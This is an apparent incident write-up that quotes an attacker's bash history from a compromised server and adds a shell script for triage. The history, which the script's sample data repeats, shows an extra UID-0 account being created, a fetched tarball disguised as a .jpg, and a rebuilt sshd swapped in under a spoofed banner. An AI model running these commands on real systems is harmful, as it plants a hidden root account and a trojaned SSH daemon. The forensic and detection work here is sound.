history of a compromised server

Here is the bash_history excerpt from a compromised server. The attacker was lazy enough not even to cover their tracks. My night just got a whole lot more exciting because of this, though.

311  /usr/sbin/useradd -o -u 0 oracle
312  passwd oracle
313  /sbin/ifconfig |grep inet
314  cd /home/oracle
315  ls
316  wget domain.tld/user/sniff.jpg
317  tar xzvf sniff.jpg
318  cd ssh
319  ls
320  telnet localhost 22
321  nano apps/ssh/ssh2version.h
322  SSH-2.0-OpenSSH_3.9p1
323  ./configure --without-x ; make ; make install
324  rm -rf /usr/sbin/sshd ; cp /usr/local/sbin/sshd /usr/sbin
325  kill -9 `cat /var/run/sshd.pid` ; /usr/sbin/sshd
326  cd ..
327  ls
328  rm -rf sniff.jpg  ssh

Caught by rkhunter.
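Reading the listing: the attacker adds a second UID-0 account (useradd -o permits the duplicate UID), fetches a source tarball disguised with a .jpg extension, reads the banner of the running daemon with telnet and edits the version header, presumably so the replacement reports the same SSH-2.0-OpenSSH_3.9p1 string as the original, then builds it, overwrites /usr/sbin/sshd, restarts the daemon and deletes the sources. What follows is an added example, not code from the post: a POSIX sh triage script that checks for the two traces this leaves behind after the cleanup, an extra UID-0 account in /etc/passwd and the tell-tale commands in shell history, and wraps the package-manager verification of the sshd binary. The passwd and history lines in it are constructed for the example, and the function and tag names are my own.

```shell
#!/bin/sh
# Added example for triage after a compromise like the one in the post.
# Not the post's own code. The passwd and history lines below are constructed
# for this example; they mirror the excerpt above but are not from the box.

# Constructed passwd excerpt: "oracle" is a second UID-0 account, which is
# exactly what "useradd -o -u 0 oracle" creates.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
oracle:x:0:0::/home/oracle:/bin/bash
bob:x:1000:1000:Bob:/home/bob:/bin/bash'

# Constructed history excerpt with the same stages as the post's listing.
SAMPLE_HISTORY='/usr/sbin/useradd -o -u 0 oracle
passwd oracle
/sbin/ifconfig |grep inet
wget domain.tld/user/sniff.jpg
tar xzvf sniff.jpg
nano apps/ssh/ssh2version.h
./configure --without-x ; make ; make install
rm -rf /usr/sbin/sshd ; cp /usr/local/sbin/sshd /usr/sbin
kill -9 `cat /var/run/sshd.pid` ; /usr/sbin/sshd
rm -rf sniff.jpg  ssh'

# Print every UID-0 account other than root. Reads passwd-format lines on
# stdin; on a live host: extra_uid0_accounts < /etc/passwd
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Tag history lines that match the stages of this attack. Reads history on
# stdin (a .bash_history file or "history" output with its leading numbers)
# and prints "TAG<TAB>command" per hit; unmatched lines are dropped.
# On a live host: flag_history < /root/.bash_history
flag_history() {
    while IFS= read -r line; do
        # Drop a leading "NNN  " history number if present.
        line=${line#"${line%%[!0-9 ]*}"}
        case "$line" in
            *useradd*-o*"-u 0"*|*useradd*"-u 0"*-o*)
                printf 'UID0_USER\t%s\n' "$line" ;;
            *"tar "*x*.jpg|*"tar "*x*.jpeg|*"tar "*x*.gif|*"tar "*x*.png)
                printf 'DISGUISED_ARCHIVE\t%s\n' "$line" ;;
            *"make install"*)
                printf 'SOURCE_INSTALL\t%s\n' "$line" ;;
            *rm*/usr/sbin/sshd*|*cp*sshd*/usr/sbin*)
                printf 'SSHD_REPLACED\t%s\n' "$line" ;;
            *kill*sshd.pid*)
                printf 'SSHD_RESTART\t%s\n' "$line" ;;
        esac
    done
}

# Verify the on-disk sshd against the package database. Only meaningful on a
# live host, so it is not run against the samples. rpm -Vf prints a line with
# S/5/T flags when size, digest or mtime differ; dpkg -V prints nothing when
# the package is intact. A source-built sshd copied over the packaged one
# fails both.
verify_sshd_package() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -Vf /usr/sbin/sshd
    elif command -v dpkg >/dev/null 2>&1; then
        dpkg -V openssh-server
    else
        echo "no package manager found; compare /usr/sbin/sshd to a known-good copy" >&2
        return 1
    fi
}

# Run the checks over the constructed samples and return results as values,
# so they can be inspected without a live system.
sample_extra_uid0() { printf '%s\n' "$SAMPLE_PASSWD" | extra_uid0_accounts; }
sample_flag_count() { printf '%s\n' "$SAMPLE_HISTORY" | flag_history | wc -l | tr -d ' '; }
sample_flag_tags()  { printf '%s\n' "$SAMPLE_HISTORY" | flag_history | cut -f1; }

echo "extra UID-0 accounts: $(sample_extra_uid0)"
printf '%s\n' "$SAMPLE_HISTORY" | flag_history
```

On the sample data the passwd check reports oracle and the history check tags five lines: the useradd, the tar of the fake jpg, the make install, the rm/cp over /usr/sbin/sshd and the kill of the sshd pid. The banner trick means a remote version scan would not have noticed the swap; the package verification (or, as here, rkhunter's file checks) is what catches the replaced binary.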
